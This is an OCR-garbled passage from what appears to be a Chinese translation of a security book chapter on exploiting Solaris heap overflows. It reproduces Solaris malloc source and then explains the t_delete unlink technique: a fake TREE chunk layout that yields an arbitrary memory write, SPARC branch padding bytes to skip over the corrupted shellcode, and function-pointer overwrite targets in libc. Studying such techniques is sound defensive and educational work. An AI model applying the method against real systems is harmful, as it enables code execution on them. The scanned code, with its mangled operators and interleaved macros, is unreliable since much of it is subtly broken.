ASSERT((SIZE(tp) $ ALIGN) -- 0); 


/* reserved the last word to head any noncontiguous memory */ 
SETBITO(SIZE(NEXT(tp))):; 


/* non-contiguous memory, free old bottom block */ 

if (Bottom && Bottom !- tp) ( 
SETBITO(SIZE(Bottom)); 
realfree(DATA(Bottom)); 
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return (tp); 





/* 
* Tree rotation functions (BU: bottom-up, TD: top-down) 
*/ 
#define LEFT1 (x, y) \ 
if ((RIGHT(x) = LEFT(y)) != NULL) PARENT(RIGHT(x)) = x;\ 
if ((PARENT(y) = PARENT(x)) != NULL) \ 
if (LEFT(PARENT(x)) == x) LEFT(PARENT(y)) = y;^ 
else RIGHT(PARENT(y)) = y;\ 
LEFT(y) = x; PARENT(x) = y 
#define RIGHT1(x, y) \ 
: if ((LEFT(x) = RIGHT(y)) != NULL) PARENT(LEFT(x)) = x;\ 
if ((PARENT(y) = PARENT(x)) !- NULL)\ 
if (LEFT(PARENT(x)) == x) LEFT(PARENT(y)) = y;\ 
else RIGHT(PARENT(y)) = y;\ 
RIGHT (y) = x; PARENT(x) = y 
#define BULEFT2 (x, y, zZ) x 
if ((RIGHT(x) = LEFT(y)) !- NULL) PARENT(RIGHT(x)) = x;\ 
if ((RIGHT(y) = LEFT(z)) != NULL) PARENT(RIGHT(y)) = y:\ 
if ((PARENT(z) = PARENT(x)) != NULL)\ 
if (LEFT(PARENT(x)) == x) LEFT(PARENT(z)) = z;^ 
else RIGHT(PARENT(z)).- z;\ ^ . E 
LEFT(z) = y; PARENT(y) = z; LEFT(y) = x; PARENT(x) = y 
#define BURIGHT2 (x, y, zZ} \ 
if ((LEFT(x) = RIGHT(y)) !- NULL) PARENT(LEFT(x)) = x;\ 
if ((LEFT(y) = RIGHT(z)) != NULL) PARENT(LEFT(y)) = yi\ 
if ((PARENT(z) = PARENT(x)) != NULL)\ 
if (LEFT (PARENT(x)) == x) LEFT (PARENT(z)) = z;^ 
else RIGHT(PARENT(z)) = z;\ 
RIGHT (z) = y; PARENT (y) = 2; RIGHT(y) = x; PARENT(x) = y 
#define TDLEFT2 (x, y, Z) \ 
if ((RIGHT(y) = LEFT(z)) != NULL) PARENT(RIGHT(y)) = yi\ 
if ((PARENT(z) = PARENT(x)) != NULL) \ 
if (LEFT(PARENT(x)) == x) LEFT(PARENT(z)) = z;^ 
else RIGHT(PARENT(z)) = z;^ 
PARENT(x) = z; LEFT(z) = x; 
#define TDRIGHT2 (x, y, 2) \ 
if ((LEFT(y) = RIGHT(z)) !- NULL) PARENT(LEFT(y)) = yi \ 


if ((PARENT(z) = PARENT(x)) !- NULL)\ 
if (LEFT(PARENT(x)) == x) LEFT(PARENT(z)) = 2;\ 
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else RIGHT(PARENT(z)) = z;^ 
PARENT (x) = z; RIGHT(z} = x; 

/* 

* Delete a tree element 

*/ 
Static void 
t delete(TREE *op) 

{ 

TREE *tp, *sp, *gp; 


/* if this is a non-tree node */ 
if (ISNOTREE(op)) { 
tp = LINKBAK(op); 


if ((sp = LINKFOR(op)) != NULL) 
LINKBAK(sp) = tp; 

LINKFOR (tp) = sp; 

return; 


/* make op the root of the tree */ 
if (PARENT (op) ) 
t_splay (op); 


/* if this is the start of a list */ 
if ((tp = LINKFOR(op)) != NULL) { 
PARENT (tp) = NULL; 
if ((sp = LEFT(op)) !- NULL) 
PARENT(sp) = tp; 
LEFT (tp) = sp; 
if ((sp = RIGHT(op)) != NULL) 
PARENT (sp) = tp; 
RIGHT(tp) = sp; 


Root = tp; 
return; 


/* if op has a non-null left subtree */ 
if ((tp = LEFT(op)) !- NULL) { 
PARENT (tp) = NULL; 


if (RIGHT(op)) { 
/* make the right-end of the left subtree its root */ 


while ((sp = RIGHT(tp)) != NULL) { 
if ((gp = RIGHT(sp)) != NULL) { 
TDLEFT2 (tp, sp, gp); 
tp = gp; 


} else { 


} 


} else if 
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LEFT1 (tp, 
tp = sp; 


sp); 


/* hook the right subtree of op to the above elt */ 


RIGHT (tp) = RIGHT (op); 
PARENT (RIGHT (tp)) = tp; 
((tp = RIGHT(op)) != NULL) /* no left subtree */ 


PARENT (tp) = NULL; 


Root = 


/* 
* Bottom up 
* The basic 
* path from 
*/ 
static void 
t_splay (TREE 
i 
TREE 


tp; 


splaying (simple version). 
idea is to roughly cut in half the 
Root to tp and make tp the new root. 


*tp) 


*pp, *gp; 
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/* iterate until tp is the root */ 
((pp = PARENT(tp)) != NULL) ( 

/* grandparent of tp */ 

gp = PARENT (pp); 


while 


/* x is a left child */ 
if (LEFT(pp) -- tp) ( 





if (gp && LEFT(gp) == pp) ( 
BURIGHT2(gp, pp, tp); 

) else { 
RIGHT1 (pp, tp); 

} 

} else { 

ASSERT (RIGHT (pp) == tp); 

if (gp && RIGHT(gp) == pp) f 
BULEFT2 (gp, pp, tp); 


} else { 


LEFT1 (pp, tp); 
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/* 
* free(). 
* Performs a delayed free of the block pointed to 
* by old. The pointer to old is saved on a list, flist, 
* until the next malloc or realloc. At that time, all the 
* blocks pointed to in flist are actually freed via 
* realfree(). This allows the contents of free blocks to 
* remain undisturbed until the next malloc or realloc. 
*/ 
void 


free(void *old) 
{ 


(void) _mutex_lock(&__malloc_lock) ; 


_free_unlocked(old); 


(void) _mutex_unlock(&__malloc_lock); 


void 


_free_unlocked(void *old) 


{ 
int i; 
if (old == NULL) 
return; 
/* 
* Make sure the same data block is not freed twice. 
* 3 cases are checked. It returns immediately if either 
* one of the conditions is true. 
* 1. Last freed. 
* 2. Not in use or freed already. 
* 3. In the free list. 
*/ 
if (old -- Lfree) 
return; 
if (I1ISBITO(SIZE(BLOCK(old)))) 
return; 
for (i = 0; i « freeidx; i++) 
if (old == flist[il) 
return; 
if (flist[freeidx] !- NULL) 
realfree(flist[freeidx]); 
flist[freeidx] Lfree - old; 
freeidx = (freeidx + 1) & FREEMASK; /* one forward */ 
j * 
/* 


* cleanfree() frees all the blocks pointed to be flist. 
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* realloc() should work if it is called with a pointer 
* to a block that was freed since the last call to malloc() or 
* realloc(). If cleanfree() is called from realloc(), ptr 
* is set to the old block and that block should not be 
* freed since it is actually being reallocated. 
*/ 
static void 
cleanfree(void *ptr) 


{ 
char **flp; 
flp = (char **)&(flist[freeidx]l); 
for (;;) t 
if (flp -- (char **)&(flist[0])) 
flp = (char **)&(flist[FREESIZE]); 
if (*--flp -- NULL) 
break; 
if (*flp !- ptr) 
realfree(*flp); 
*flp - NULL; 
} 
freeidx = 0; 
Lfree = NULL; 
} 
/* Copyright (c) 1988 AT&T */ 
/* All Rights Reserved */ 
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF AT&T */ 
/* The copyright notice above does not evidence any */ 
/* actual or intended publication of such source code. */ 
/* 


* Copyright (c) 1996-1997 by Sun Microsystems, Inc. 
* All rights reserved. 


*/ 
#pragma ident "@(#)mallint.h 1.11 97/12/02 SMI" 45 
SVr4.0 1.2 */ 


#include «sys/isa defs.h» 
#include <stdlib.h> 
#include <memory.h> 
#include <thread.h> 
#include <synch.h> 
#include <mtlib.h> 


/* debugging macros */ 
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#ifdef DEBUG 

#define ASSERT (p) ((void) ((p) || (abort(), 0))) 
#define COUNT (n) ((void) n++) 

static int nmalloc, nrealloc, nfree; 

#else 

#tdefine ASSERT (p) ( (void) 0) 

#define COUNT (n) { (void) 0) 


#endif /* DEBUG */ 


/* function to copy data from one area to another */ 


#define 


/* for conve 
#ifndef NULL 


MEMCOPY (to, fr, n) ((void) memcpy(to, 


niences */ 


#define NULL (0) 

#endif 

#define reg register 

#define WORDSIZE (sizeof (WORD) ) 
#define MINSIZE (sizeof (TREE) 
#define ROUND (s) if (s % WORDSIZE) s 
#ifdef DEBUG32 

/* 


* The follo 


wing definitions ease debugging 


* on a machine in which sizeof(pointer) == 


* These def 
* 

* Alignment 
*/ 
#define 
typedef int 


initions are not portable. 


(ALIGN) changed to 8 for SPARC 


ALIGN 8 
WORD; 


typedef struct _t_ { 


size_t 
struct 
struct 
struct 
struct 
struct 
} TREE; 
#define 
#define 
#define 
#define 
#define 
#define 
#define 


#else /* 


t s; 

tl *t_p; 
t. *t 1; 
_t_ *t r; 
_t_ *t n; 
to *t d; 
SIZE(b) ((b)-»t s) 
AFTER (b) ((b)-»t p) 
PARENT (b) ((b)-»t p) 
LEFT (b) ((b)-»t, 1) 
RIGHT (b) ((b)-»t r) 
LINKFOR (b) ((b)-»t n) 
LINKBAK (b) ( (b) -»t. p) 

!DEBUG32 */ 


fr, 


n)) 


- sizeof (WORD)) 
+= (WORDSIZE - 


sizeof(int) 


ldd/std. 


(s $ WORDSIZE)) 
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/* 
* All of our allocations will be aligned on the least multiple of 4, 
* at least, so the two low order bits are guaranteed to be available. 
*/ 

#ifdef  LP64 

#define ALIGN 16 

#else 

#define ALIGN 8 

#endif 


/* the proto-word; size must be ALIGN bytes */ 
typedef union _w_ { 


size_t w_i; /* an unsigned int */ 
struct _t_ *w D; /* à pointer */ 
char w a[ALIGN]; /* to force size */ 

) WORD; 


/* structure of a node in the free tree */ 
typedef struct t { 


WORD t s; /* size of this element */ 

WORD tpi /* parent node */ 

WORD t 1; /* left child */ 

WORD tr; /* right child */ 

WORD tn; /* next in link list */ 

WORD t d; /* dummy to reserve space for self-pointer */ 
) TREE; 


/* usable # of bytes in the block */ 
#define SIZE(b) (((b)->t_s).w_i) 


/* free tree pointers */ 





#define PARENT (b) (((b)-»t p).w p) 

#define LEFT (b) (((b)->t_1).w_p) 

#define RIGHT (b) (((b)->t_r).w_p) 

/* forward link in lists of small blocks */ p 
#define AFTER (b) (((b)->t_p).w_p) 


/* forward and backward links for lists in the tree */ 


#define LINKFOR (b) (((b)-»-»t n).w p) 
#define LINKBAK (b) (((b)-»t p).w p) 
#endif /* DEBUG32 */ 


/* set/test indicator if a block is in the tree or in a list */ 
#define SETNOTREE (b) (LEFT(b) = (TREE *) (-1)) 
#define ISNOTREE (b) (LEFT(b) == (TREE *)(-1)) 


/* functions to get information on a block */ 
#define DATA (b) (( (char *)(b)) + WORDSIZE) 
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#define BLOCK (d) ((TREE *) (((char *) (d)) - WORDSIZE)) 

#define SELFP (b) ( (TREE **)(((char *)(b)) + SIZE(b))) 

#define LAST(b) (*( (TREE **)(((char *)(b)) - WORDSIZE))) 
#define NEXT (b) ( (TREE *)(((char *)(b)) + SIZE(b) + 
WORDSIZE)) 

#define BOTTOM (b) ((DATA(b) + SIZE(b) + WORDSIZE) == Baddr) 


/* functions to set and test the lowest two bits of a word *, 


#define BITO (01) /* ...001 */ 

#define BITi (02) /* ...010 */ 

#define BITS01 (03) /* ...011 */ 

#define ISBITO (w) ((w) & BITO) /* Is busy? */ 

ddefine ISBIT1 (w) ((w) & BIT1) /* Is the preceding free? */ 
#define = SETBITO(w) ((w) |= BITO) /* Block is busy */ 
#define SETBIT1 (w) ((w) |= BIT1) /* The preceding is free */ 
#define CLRBITO(w) ((w) &= -BITO) /* Clean bitO */ 

#define CLRBIT1 (w) ((w) &= ~BIT1) /* Clean biti */ 

#define SETBITSO1 (w) ((w) |= BITSO1) /* Set bits 0 & 1 */ 
#define CLRBITSO1 (w) ((w) &= ~BITSO1) /* Clean bits 0 & 1 */ 


#define SETOLDO1(n, o) ((n) |= (BITSO1 & (0))) 


/* system call to get more core */ 

#define GETCORE sbrk 

#define ERRCORE ((void *) (-1)) 
#define CORESIZE (1024 *ALIGN) 


extern void *GETCORE (size_t); 
extern void .free unlocked(void *); 


#ifdef _REENTRANT 
extern mutex t __malloc_lock; 
#endif /* _REENTRANT */ 


TREE 结构 的 基本 元 素 被 定义 为 WoRD， 如 下 所 示 ; 


/* the proto-word; size must be ALIGN bytes */ 
typedef union _w_ { 


size_t wii; /* an unsigned int */ 
struct t. *w D; /* a pointer */ 
char WwW_ a[ALIGN]; /* to force size */ 
} WORD; 
对 于 libe 的 32 位 版 本 ，ALIGN 被 定义 为 8， 从 而 union 的 总 大 小 为 8B。 
空闲 树 里 的 节点 结构 被 定义 为 ， 
typedef struct _t_ { 
WORD t s; /* size of this element */ 
WORD tp; /* parent node */ 
WORD t_l; /* left child */ 
WORD tr; /* right child */ 


WORD tn; /* next in link list */ 
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WORD t_d; /* dummy to reserve space for self-pointer */ 
} TREE; 


这 个 结构 由 6 个 woRD 组 成 ， 共 48 字 节 。 对 任何 实际 使 用 中 的 堆 块 〈 包 括 基本 的 头 部 ) 来 说 ， 
这 是 最 小 的 。 


10.7 基本 的 破解 方法 (t delete) 


Solaris 上 堆 涪 出 的 传统 破解 方法 是 基于 块 合并 的 。 改 写 当 前 块 的 外 部 边界 将 导致 内 存 中 下 一 
个 块 的 头 部 被 破坏 。 当 堆 管 理 例 程 处 理 被 破坏 的 块 时 ， 将 改写 内 存 ， 最 终 导 致 执行 shellcode。 

溢出 导致 下 一 个 块 的 大 小 被 改变 。 如 果 用 合适 的 负数 改写 它 ， 将 在 溢出 字符 串 的 较 后 位 
置 发 现下 一 个 块 。 这 对 破解 是 有 利 的 ， 因 为 负数 的 块 大 小 不 包含 空 字 节 ， 可 以 通过 字符 串 库 
函数 进行 复制 。 可 以 在 滋 出 字符 串 较 后 的 位 置 构造 TREE 结构 。 这 将 使 伪造 块 与 被 破坏 的 块 一 


起 被 整理 。 
对 伪造 块 最 简单 的 构造 是 促成 函数 上 _aelete{) 被 调用 。Pprack # 第 57 期 里 名 为 Once Upon a 


free0 的 文章 (2001 年 8 月 11 日 ) 第 一 次 提 到 了 这 个 方法 。 下面 的 代码 段 摘自 malloc .c 和 mallint .h: 
在 realfree() 里 : 


/* see if coalescing with next block is warranted */ 
np = NEXT(tp); 
if (!ISBITO(SIZE(np))) { 
if (np != Bottom) 
t_delete(np); 


函数 t_qdelete 1() : 
/* 
* Delete a tree element 
*/ 
static void 
t_delete(TREE *op) 
{ 
TREE *tp, *sp, *gp; 


/* if this is a non-tree node */ 
if (ISNOTREE(op)) { 
tp = LINKBAK(op); 


if ((sp = LINKFOR(op)) != NULL) 
LINKBAK (sp) = tp; 
LINKFOR (tp) = sp; 
return; 
} 

有 关 的 宏 定 义 如 下 : 
#define SIZE(b) (((b)-»t s).w i) 
#define PARENT (b) (((b)-»t p).w p) 
#define LEFT (b) (((b)-»t 1).w p) 


#define RIGHT (b) (((b)-»t r).w p) 
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#define LINKFOR (b) (((b)-»t n).w p) 
#define LINKBAK (b) (((b)-»t p).w p) 
#define ISNOTREE (b) (LEFT(b) == (TREE *) (~1)) 


如 上 段 代 码 所 示 TREE op 结构 被 传递 给 t_delete()。 伪 造 块 通过 溢出 构造 并 指向 结构 op。 
如 果 ISNOTREE () AR, 将 从 伪造 的 TREE 结 构 op 获 得 两 个 指针 tp 和 sp。 这 些 指针 是 TREE 结 构 指 针 ， 
并 且 完 全 被 攻击 者 所 控制 。 每 个 字段 被 设 为 指向 其 他 TREE 结 构 的 指针 。 

LINKFOR 宏 引用 TREE 结 构 里 的 t_n 字 段 (位 于 结构 内 偏 移 32B 处 )， 而 LINKBAK 宏 引用 t_p 字 
段 ( 位 于 结构 内 偏 移 8B 处 )。 如果 TREE 结 构 的 t_1 字 段 ( 位 于 结构 内 偏 移 16B 处 ) 是 -1, 则 ISNOTREE 
为 真 。 

上 面 的 描述 可 能 有 些 乱 ， 总 结 一 下 ， 前 面 代码 的 最 终 意思 如 下 如 示 。 

(1) 如 果 TREE op 的 t_1l1 (位 于 结构 内 偏 移 16B 处 字段 等 于 -1， 继 续 下 一 步 。 

(2) TREE 通 过 LINKBAK 宏 初始 化 指针 tp， 将 从 op 接受 t_p 字 段 〈 位 于 结构 内 偏 移 8B 处 )。 

(3) TREE 通 过 LINKFOR 宏 初始 化 指针 sp， 将 从 op 接受 t_n 字 段 〈 位 于 结构 内 偏 移 32B 处 )。 

(4) 宏 LINKBAK 把 sp 的 t_p 字 段 《位 于 结构 内 偏 移 8B 处 〉 设 为 指针 tp。 

(5) 宏 LINKBAK 把 tp 的 t_n 字 段 ( 位 于 结构 内 偏 移 32B 处 ) 设 为 指针 sp。 

在 整个 过 程 里 ， 步 又 (4) 和 ($) 是 最 有 趣 的 ， 可 能 导致 任意 值 被 写 入 任意 地 址 ， 互 写 情形 是 关 
于 它 的 最 好 描述 。 这 个 操作 类 似 于 在 双向 链表 中 删 去 一 个 条 目 。 能 完成 这 个 的 TREE 结 构 构 造 如 表 
10-9 所 示 。 


310-9 互 写 操作 需要 的 TREE 结 构 











FF FF FF F8 AA AA AA AA TP TP TP TP AA AA AA AA 
FF FF FF FF AA AA AA AA AA AA AA AA AA AA AA AA 
SP SP SP SP AA AA AA AA AA AA AA AA AA AA AA AA 


上 面 的 rREE 构 造 将 导致 tp 的 值 被 写 到 sp+8 字 节 处 ，sp 的 值 被 写 到 tp+32 字 节 处 。 例 如 ，sp 
可 能 指向 函数 指针 位 置 -7 字 节 处 ，tp 可 能 指向 包含 NOP sled 和 shellcode 的 地 方 。 当 执行 E_delete 
内 的 代码 时 ， 将 用 指向 shellcode 的 tp 的 值 改写 函数 指针 。 然 而 ，shellicode 里 32B 人 处 的 值 将 被 sp 的 
值 改写 。 

FF FF FF FF 树 结构 里 16B 处 的 值 是 -1， 需 要 指出 的 是 ， 这 个 结构 不 是 树 的 一 部 分 。FF FF FF 
F8 偏 移 零 处 的 值 是 块 的 大 小 。 为 了 避 开 空 字 节 ， 把 这 个 值 设 为 负数 就 比较 方便 了 ; 然而， 倘若 
最 低 两 位 没有 被 设置 ， 它 就 可 以 是 实际 的 块 大 小 。 如 果 第 一 位 被 设置 ， 指 出 这 个 块 正 在 使 用 中 ， 
则 不 适合 合并 。 为 了 避免 和 前 一 个 块 合并 ， 第 二 位 也 应 该 被 清除 。AA 表 示 的 字 节 可 以 用 任意 值 
填充 。 


10.7.1 标准 堆 溢出 的 限制 


我 们 在 前 面 提 到 了 non-tree 删 除 堆 溢出 机 制 的 第 一 个 限制 。shellcode 里 可 预知 偏 移 处 的 4B 值 
在 free 操 作 过 程 中 被 破坏 了 。 可 行 的 解决 办 法 是 使 用 由 往 前 跳 固定 距离 的 分 支 操作 组 成 的 NoP 填 
充 物 。 这 能 被 用 来 越过 因 互 写 而 产生 的 恶化 ， 像 正常 情况 那样 继续 执行 shellcode。 
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如 果 有 可 能 ,至 少 应 该 在 shellcode 前 面包 含 256B 的 填充 物 ,， 在 堆 溢 出 里 可 以 用 下 面 的 分 支 指 
令 作 填 充 物 。 它 将 向 前 跳 转 0x404 字 节 ， 跳 过 互 写 所 做 的 修改 。 这 人 么 大 的 跳 转 距离 主要 是 为 了 避 
开 空 字 节 ， 但 是 如 果 shellcode 中 可 以 包含 空 字 节 ， 那 么 应 该 尽量 减少 跳 转 距离 。 

#define BRANCH AHEAD "\x10\x80\x01\x01" 

注意 ， 如 果 选 择 改 写 在 栈 上 的 返回 地 址 ，TrREE 结 构 的 sp 成 员 必 须 指 向 这 个 位 置 减 8B 处 。 不 
能 把 tp 成 员 指 向 返回 位 置 减 32B 处 , 因为 这 将 导致 新 返回 地 址 加 8B 处 的 值 被 不 是 有 效 代码 的 指针 
改写 。 记 住 ，ret 是 由 jmpl 317 + 8，s%g0 合 成 的 指令 。 寄 存 器 si7 保 存 最 初 的 调用 地 址 ， 因 
此 执行 将 转 到 地 址 加 8B 处 “4B 用 于 cal1l1， 另 外 4B 用 于 延迟 槽 )。 如 果 返 回 地 址 往 前 偏 移 8B 处 的 
地 址 被 改写 ， 这 将 是 第 一 条 被 执行 的 指令 ， 肯 定 会 引起 贿 演 。 如 果 你 改写 shellcode 往 前 32B 处 和 
越过 第 一 条 指令 24B 处 的 值 ， 那 么 将 有 机 会 越过 被 破坏 的 地 址 。 

在 大 多 数 情况 下 ， 互 写 操作 情形 引入 的 其 他 限制 不 是 很 关键 ， 但 值得 注意 。 被 改写 的 目标 地 
址 和 用 来 改写 的 值 必须 都 是 可 写 的 有 效 地 址 。 它 们 是 双向 写 操作 ， 两 个 地 址 中 只 要 有 一 个 是 不 可 
写 内 存 区 域 ， 都 将 会 导致 段 故 障 。 因 为 正常 的 代码 是 不 可 写 的 ， 这 就 排除 了 返回 libc 类 型 的 攻击 
的 可 能 性 ， 因 为 这 类 攻击 要 利用 在 进程 地 址 空间 内 发 现 的 先前 存在 的 代码 。 

破解 Solaris 堆 实现 的 另外 一 个 限制 是 ， 必 须 在 被 破坏 的 块 被 释放 之 后 再 调用 malloc 或 
realloc。 因 为 free() 只 把 块 放 入 空 闪 列表 中 ， 而 不 对 它 做 任何 实质 性 的 处 理 ， 对 被 破坏 的 块 来 
说 ， 促 成 realfree () 被 调用 是 必需 的 。 这 在 malloc 或 realloc (通过 cleanfree) 内 几乎 可 以 
立即 完成 。 如 果 这 是 不 可 能 的 ， 通 过 连续 多 次 调用 free() 能 真正 释放 被 破坏 的 块 。 空 闪 列 表 最 
多 保存 32 个 条 目 ， 当 它 满 了 以 后 , 每 个 后 来 的 free () 操 作 将 通过 realfree () 把 一 个 条 目 (entry) 
从 空闲 列表 刷 去 。 在 大 多 数 应 用 程序 里 ，malloc 和 realloc 调 用 是 相当 普通 的 , 通常 没有 太 大 的 
限制 ， 然 而， 在 某 些 情 况 下 ， 扒 恶化 的 地 方 并 不 完全 可 控 ， 因 此 ， 在 调用 malloc 或 realloc 发 生 
前 很 难 预 防 程序 骨 溃 。 

为 了 使 用 上 面 描 述 的 方法 ， 某 些 字符 是 必需 的 ,特别 是 字符 0xFF， 为 了 使 ISNOTREE O AH, 
它 是 必需 的 。 如 果 加 在 输入 之 上 的 字符 限制 阻止 这 些 字 符 作 为 溢出 的 一 部 分 被 使 用 ， 那 么 通过 进 
一 步 利 用 t_gelete() 及 t_splay () 内 的 代码 执行 任意 改写 总 是 有 可 能 的 。 这 些 代码 将 处 理 TREE 
结构 ， 就 好 像 它 真 是 空 闪 树 的 一 部 分 ， 从 而 使 改写 更 加 复杂 。 更 多 的 限制 将 加 在 写 入 值 和 被 写 的 
地 址 上 。 


10.7.2 ”改写 的 目标 

改写 内 存 中 任意 位 置 4B 的 能 力 对 执行 代码 来 说 足够 了 ， 然 而 ， 攻 击 者 为 了 完成 这 个 目标 ， 
必须 精确 地 知道 要 改写 什么 。 

改写 栈 上 保存 的 程序 计数 器 总 是 可 行 的 , 特别 是 在 攻击 者 能 够 重复 进行 攻击 的 前 提 下 。 命令 
行 参数 或 环境 变量 里 的 小 变化 可 能 导致 栈 地 址 稍微 有 些 变 化 ， 导 致 它们 变化 的 原因 因 系 统 而 异 。 
然而 ， 如 果 攻 击 者 可 以 重复 多 次 攻击 ， 或 者 很 了 解 目标 系统 ， 成 功 执行 栈 溢出 是 有 可 能 的 。 

与 其 他 的 平台 不 同 , Solaris/SPARC 的 Procedure Linkage Table (PLT) 代码 不 会 解除 引用 Global 
Offset Table (GOT) 里 的 值 。 结 果 ， 对 改写 来 说 ， 那 里 没有 很 多 合适 的 函数 指针 。 一 旦 外 部 引用 
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的 后 期 绑 定 (lazy binding) “在 要 求 时 被 解析 ， 且 外 部 引用 被 解析 过 ，PLT 就 被 初始 化 ， 加 载 外 部 
引用 地 址 到 %gl1， 然 后 跳 转 到 那个 地 址 。 尽 管 有 些 攻击 允许 用 SPARC 指 令 改写 PLT， 但 通常 对 堆 
游 出 没什么 益处 。 因 为 TREE 结 构 的 tp 和 sp 必须 是 可 写 的 有 效 地 址 ,生成 一 条 指向 shellcode 并 且 是 
有 效 的 可 写 地 址 的 单 指令 的 可 能 性 微乎其微 。 

然而 ，Solaris 的 库 函 数 中 有 许多 有 用 的 函数 指针 。 在 GDB 里 只 从 溢出 的 角度 跟踪 分 析 有 可 能 
对 改写 有 用 的 地 址 。 为 使 破解 可 在 多 版 本 和 Solaris 的 安装 上 移植 ， 创 建 一 个 大 的 库 函 数 版 本 列表 
是 很 有 必要 的 。 例 如 ， 地 函数 经 常 调用 函数 metex_Lock 执 行 非 线程 安全 代码 。 而 在 其 他 库 函 数 
H, malloc 和 free 函 数 会 立即 调用 非 线程 安全 代码 。 这 个 函数 访问 libc 的 .aata 区 段 内 称 为 
ti_jmp_table 的 地 址 表 ， 调 用 表 里 4B 处 的 函数 指针 。 

男 一 个 可 能 有 用 的 例子 是 当 进 程 调用 exit () 时 函数 指针 被 调用 。 在 _exithandle 函 数 里 ， 
从 称 为 static_mem 的 lib 的 ,qata 区 段 内 的 内 存 区 域 重 新 找 回 函 数 指针 。 这 个 函数 指针 通常 指向 
由 exit 调 用 的 fini () 例 程 ， 从 而 执行 cleanup 命 令 , 但 是 它 能 被 改写 ， 以 促成 在 exit 上 执行 任意 
代码 。 像 这 样 的 、 相 对 通用 的 、 遍 及 libc 和 其 他 Solaris 库 函数 的 代码 ， 对 执行 任意 代码 提供 了 很 
好 的 机 会 。 

1. 底部 块 

底部 块 是 位 于 堆 结尾 和 未 分 页 内 存 前 的 最 后 据 。 大 多 数 扒 实现 会 把 这 个 块 作为 特殊 情况 处 
理 ，Solaris 也 不 例外 。 底 部 块 如 果 出 现 ， 儿 乎 总 是 空闲 的 ， 因 此 ， 即 使 它 的 头 部 被 破坏 也 不 会 真 
的 被 释放 。 如 果 只 能 破坏 底部 块 ， 那 么 必须 有 可 选 的 余地 。 

在 _malloc_unlocked 里 有 如 下 代码 行 : 

/* if found none fitted in the tree */ 

if (!sp) { 


if (Bottom && size <= SIZE(Bottom)) { 
sp = Bottom; 


/* iff the leftover is enough for a new free piece */ 
if ((n = (SIZE(sp) - size)) >= MINSIZE + WORDSIZE) { 
n -- WORDSIZE; 
SIZE(sp) = size; 
tp = NEXT (sp); 
SIZE(tp) = n|BITO; 
realfree(DATA(tp)); 


在 这 个 例 里 ， 如 果 用 负数 改写 底部 块 的 大 小 ， 可 以 促成 realtfree O 调用 位 于 底部 块 里 偏 移 


CD 后 期 绑 定 〈lazybinding) 方式 一 般 会 大 大 提高 应 用 程序 的 性 能 ， 因 为 不 必 为 解析 无 用 的 符号 浪费 动态 连接 器 的 开 
销 。 不 过 ， 有 两 种 情况 例外 。 第 一 ， 对 一 个 共享 目标 函数 进行 初始 化 处 理 花 费 的 时 间 比 调用 正式 的 执行 时 间 长 ， 
因为 动态 连接 器 会 拦截 调用 以 解析 符号 ， 而 这 个 函数 功能 又 比较 简单 ， 第 二 ， 如 果 发 生 错 误 或 动态 连接 器 无 法 解 
析 符 号 ， 动 态 连接 器 就 会 终止 程序 。 使 用 后 期 连接 方式 ， 这 种 错误 可 能 会 在 程序 执行 过 程 中 随时 发 生 。 而 有 些 应 
用 程序 对 这 种 不 确定 性 有 比较 严格 的 限制 。 因 此 ， 需 要 关闭 后 期 连接 方式 ， 在 应 用 程序 接受 控制 权 之 前 ， 让 动态 
连接 器 处 理 进程 初始 化 期 间 发 生 的 这 些 错 误 。 一 一 译 者 注 
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处 的 用 户 控制 的 数据 。 

在 前 面 的 示例 代码 里 ，sp 用 被 破坏 的 大 小 指向 底部 块 。 为 了 重新 分 配 内 存 ， 将 占用 底部 块 
的 一 部 分 ， 新 块 tp 将 它 的 大 小 设 为 n。 在 这 个 例子 里 , 变量 n 是 被 破坏 的 负数 大 小 , 减 去 WORDSIZE 
和 新 分 配 的 大 小 。 然 后 在 新 构造 的 块 (tp) 上 调用 realfree ()，tp 的 值 为 负数 。 在 这 里 ， 前 面 
提 到 的 使 用 t_delete() 的 方法 也 适用 。 

2. 小 块 恶 化 

实际 的 malloc 块 的 最 小 尺寸 是 48B, 是 保存 TREE 结构 所 必需 的 (这 包括 了 头 部 大 小 )。Solaris 
堆 实 现 丰 是 把 所 有 小 的 malloc 请 求 凑 成 大 的 请 求 ， 而 是 用 其 他 的 方法 处 理 小 块 。 任 何 小 于 40B 的 
malloc () 请 求 产 生 的 处 理 与 大 的 请 求 产 生 的 处 理 都 不 一 样 。 这 通过 malloc.c 内 的 _smalloc 函 数 
来 实现 。 这 段 代码 处 理 “ 上 舍 入 ”后 为 8、16、24 或 32B 的 请 求 。 

_smalloc 函 数 分 配 相同 大 小 的 内 存 块 来 满足 小 malloc 请 求 。 这 些 块 被 安排 在 一 个 链表 里 ， 当 
分 配 请 求 合 适 的 大 小 时 ， 返 回 链表 的 头 部 。 当 一 个 小 块 被 释放 时 ， 它 并 不 经 过 正常 处 理 ， 只 是 被 
放 回 在 它 头 部 的 正确 的 链表 里 。libc 维 护 一 个 包含 链表 头 的 静态 缓冲 区 。 因 为 这 些 内 存 块 没有 经 
过 正常 的 处 理 ， 所 以 为 了 处 理发 生 在 它们 内 部 的 溢出 ， 需 要 有 一 些 选 择 对 象 。 

小 malloc 块 的 结构 如 表 10-10 所 示 。 


3210-10 ”小 malloc 块 的 结构 
字 大 小 (8B) 下 一 个 字 (8B) 用 户 数据 (8B、16B、24B 或 32B) 


因为 小 块 与 大 块 之 间 的 区 别 只 是 大 小 (长 度 ) 字段 的 不 同 ， 所 以 有 可 能 用 大 数 或 负数 改写 小 
malloc 块 的 大 小 (长 度 ) 字段 。 这 将 在 它 被 释放 时 使 它 经 历 正常 的 块 处 理 过 程 ， 从 而 供 标准 的 
堆 破 解 方 法 使 用 。 | 

小 malloc 块 的 链表 属性 也 可 被 用 于 其 他 有 趣 的 破解 方法 中 。 在 某 些 情况 下 ， 不 可 能 用 攻击 
者 控制 的 数据 破坏 附近 的 块头 部 。 个 人 经 验 显 示 ， 这 种 情形 并 不 罕见 ， 特 别 是 当 改 写 块 头 部 的 数 
据 是 任意 字符 串 或 一 些 不 可 控 的 数据 时 通常 会 出 现 这 种 情形 。 可 能 的 话 ， 最 好 用 攻击 者 定义 的 数 
据 改写 堆 的 其 他 部 分 ， 然 而 ， 经 常会 将 数据 写 入 小 malloc 块 链表 里 。 通 过 改写 在 这 个 链表 里 的 
next 指 针 ， 有 可 能 使 malloc() 返 回 一 个 指向 内 存 任 意 位 置 的 指针 。 无 论 什么 程序 数据 被 写 到 
